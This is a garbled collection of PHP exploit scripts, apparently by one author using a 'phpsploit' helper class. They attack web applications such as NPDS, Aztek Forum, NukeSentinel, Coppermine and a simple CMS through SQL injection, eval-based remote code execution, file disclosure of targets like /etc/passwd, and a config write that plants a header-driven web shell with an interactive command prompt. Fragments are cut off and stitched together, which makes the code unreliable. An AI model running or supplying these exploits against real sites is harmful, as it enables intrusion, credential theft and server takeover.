function main()
{
// :)
$web = new phpsploit();
$web->agent('Mozilla Firefox');
// Hey ya :)
head();
// Target
$url = get_p('url', true);
// Proxy options
$prh = get_p('proxhost');
$pra = get_p('proxauth');
// Use a proxy ?
if ($prh) {
// host:ip
$web->proxy($prh);
// Authentication
if ($pra) {
$web->proxyauth($pra);
}
}
// Single quote bypass
$byp = "1');";
// PHP code
$php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
// Separator
$s_sep = md5(rand(0, 1000000000) . 'HEY_YA');
$c_sep = "print('{$s_sep}');";
// Final PHP code
$final = $byp . $c_sep . $php . $c_sep . 'exit();//';
// Welcome guess !
while (($cmd = cmd_prompt()) !== false) {
// magic_quotes_gpc bypass
$web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");'));
// Go =]
$web->get($url . 'index.php?fields=' . to_char($final) . ',1');
// Result
$res = explode($s_sep, $web->getcontent());
// Erf
if (!isset($res[1])) {
print "\nFailed";
exit(1);
} else {
if (empty($res[1])) {
print "\nNo output: system() disabled OR cmd failed OR cmd without output";
} else {
print "\n" . $res[1];
}
}
}
return;
}
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
if ($argc < 3) {
print "\n TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n NOTE | Works regardless of php settings\n USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy If you wanna use a proxy <proxyhost:proxyport> \n | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
exit(1);
}
$url = getparam('url', 1);
$pro = getparam('proxy');
$pra = getparam('proyauth');
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
$xpl->proxy($pro);
}
if ($pra) {
$xpl->proxyauth($pra);
}
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125. settype ($lid, "integer");
# 126. PrintPage("links",$DB, $lid);
#
# 30. if ($oper=="links") {
# 31. $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32. list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40. if ($DB) {
# 41. $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
+-> Remote File Inclusion (admin rights needed in order to insert "top_url" in "atk_forums")
---[ CODE ./index/common_actions.php
------------------------------------
$file = $_FILES['upload']['tmp_name']; ...
if(@copy($file,$path_file)) $avatar=$path_file;
------------------------------------
|
+-> $_FILES can be overwritten (with extract()), this can lead to file disclosure =).
*/
$url = $argv[1];
$prs = $argv[2];
$pra = $argv[3];
$xpl = new phpsploit();
if (!empty($prs)) {
$xpl->proxy($prs);
}
if (!empty($pra)) {
$xpl->proxyauth($pra);
}
print "\nheader> Aztek Forum 4.1 Multiple Vulnerabilities Exploit";
print "\nheader> ==================================================";
if (preg_match("#href='\\./index\\.php\\?owner=(\\S*)'#i", $xpl->getcontent($xpl->get($url . 'forum.php?fid=-1%20or%201=1')), $matches)) {
print "\nsploit> Owner -> " . $matches[1];
} else {
die("\nsploit> Exploit failed");
}
$owner = $matches[1];
print "\nstatus> Trying to register a new user";
$xpl->cookiejar(1);
$xpl->allowredirection(1);
if ($argc < 3) {
print "\n-- NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit ---\n-----------------------------------------------------------------------\nPHP conditions: none\nCMS conditions: disable_switch<=0 (module activated), track_active=1\n Credits: DarkFig <*****@*****.**>\n URL: http://www.acid-root.new.fr/\n-----------------------------------------------------------------------\n Usage: {$argv['0']} -url <> [Options]\n Params: -url For example http://victim.com/phpnuke/ \nOptions: -prefix Table prefix (default=nuke)\n -debug Debug mod activated (debug_ns.html)\n -truetime Server response time which returns true\n -benchmark You can change the value used in benchmark()\n -proxy If you wanna use a proxy <proxyhost:proxyport> \n -proxyauth Basic authentification <proxyuser:proxypwd>\nExample: {$argv['0']} -url http://localhost/phpnuke/ -debug\n Note: This exploit is based on the server response time\n If you have some problems use -debug, -benchmark, -truetime\n-----------------------------------------------------------------------\n";
exit(1);
}
$url = getparam("url", 1);
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
$debug = getparam("debug") != "" ? 1 : 0;
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
$xpl->proxy($proxy);
}
if ($proxyauth) {
$xpl->proxyauth($proxyauth);
}
if ($debug) {
debug(1);
}
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
function bruteforce($field)
{
global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
/*/
$url = $argv[1];
$adu = $argv[2];
$adp = $argv[3];
$pxs = $argv[4];
$pxa = $argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
print "\nstatus> Using a proxy {$pxs}";
$xpl->proxy($pxs);
}
if (!empty($pxa)) {
print "\nstatus> Basic proxy authentification {$pxa}";
$xpl->proxyauth($pxa);
}
/*/
Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
print "\nsploit> Coppermine version " . $matches[1];
} else {
print "\nsploit> Not found";
}
#!/usr/bin/php
<?php
if ($argc < 3) {
print "\n --------------------------------------------------------\n Affected.scr..: Simple Web Content Management System\n Poc.ID........: 18070102\n Type..........: SQL Injection\n Risk.level....: Medium\n Src.download..: www.cms-center.com\n Poc.link......: acid-root.new.fr/poc/18070102.txt\n Credits.......: DarkFig\n --------------------------------------------------------\n Usage.........: php xpl.txt <url> <file>\n Options.......: <proxhost:proxport> <proxuser:proxpass>\n Example.......: php xpl.txt http://hihi.org/ /etc/passwd\n --------------------------------------------------------\n";
exit(1);
}
$url = $argv[1];
$file = $argv[2];
$proxh = $argv[3];
$proxa = $argv[4];
$xpl = new phpsploit();
$xpl->agent("Mozilla");
if ($proxh) {
$xpl->proxy($proxh);
}
if ($proxa) {
$xpl->proxyauth($proxa);
}
/*
* $id = $_GET['id'];
* $query = "SELECT * from content WHERE id = $id";
* ...
* @return $row->text;
*
* Simple SQL injection (register_globals=off ; magic_quotes_gpc=on).
* What we want is not in the database, it's in a file (config.php):
*
* //this are the logins for the admin part. Change them for security.
* $login = "******"; //your login for the admin section.
* $pass = "******"; //your login for the admin section.
*
<?php
error_reporting(E_ALL ^ E_NOTICE);
head();
if ($argc < 3) {
usage();
}
$url = getparam('url', true);
$prx = getparam('proxy', false);
$pra = getparam('proxyauth', false);
$cod = 'eval($_SERVER[HTTP_SHELL]);';
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if ($prx) {
$xpl->proxy($prx);
}
if ($pra) {
$xpl->proxyauth($pra);
}
print "0x01>Deleting the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'suppr=1');
print "\n0x02>Creating the file auth.inc.php";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
print "\n0x03>Trying to log in as Administrator";
$xpl->post($url . 'dirsys/modules/auth.php', 'login=root&password=toor');
// Minimum data necessary (fwrite without quote)
$minimdata = 'WIDTH_TREE_FRAME=1&FRAME_BORDER=1&WIDTH_FRAME_BORDER=1&WIDTH_FRAME_SP' . 'ACING=1&SCROLING_TREE_FRAME=1&RESIZE_FRAME=1&WIDTH_TD_SIZE=1&WIDTH_TD' . '_TYPE=1&WIDTH_TD_DATE=1&STYLE=1&TOTALSIZE=1&CHECK_MAJ=1&IMAGE_BROWSER' . '=1&IMAGE_TN=1&GD2=1&IMAGE_JPG=1&IMAGE_GIF=1&IMAGE_BMP=1&IMAGE_TN_SIZE' . '=1&IMAGE_TN_COMPRESSION=1&NB_COLL_TN=1&EXIF_READER=1&SLIDE_SHOW=1&DEB' . 'UG=0;' . urlencode($cod) . '//&SLIDE_SHOW_INT=1&BACK=1&WRITE_TN=1&AUTO_RE' . 'SIZE=1&DETAILS=1&DIRINFO_LIFE=1&activer_Message=1';
print "\n0x04>Creating the file config.inc.php";
$xpl->post($url . 'dirsys/modules/config/post.php', $minimdata);
print "\n0x05>Now enter your commands";
